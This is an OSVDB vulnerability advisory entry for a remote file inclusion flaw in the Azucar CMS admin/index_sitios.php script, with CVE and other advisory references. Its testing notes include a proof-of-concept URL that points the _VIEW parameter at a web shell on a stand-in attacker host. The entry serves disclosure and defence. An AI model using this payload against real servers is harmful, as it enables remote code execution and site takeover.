Azucar admin/index_sitios.php CMS _VIEW Variable Remote File Inclusion

2006-12-18T10:03:46
ID OSVDB:32354
Type osvdb
Reporter OSVDB
Modified 2006-12-18T10:03:46

Description

Manual Testing Notes

http://[target]/[path]/admin/index_sitios.php?_VIEW=http://[attacker]/shell.php

References:

Secunia Advisory ID:23416 Other Advisory URL: http://www.milw0rm.com/exploits/2943 ISS X-Force ID: 30935 FrSIRT Advisory: ADV-2006-5060 CVE-2006-6720 Bugtraq ID: 21638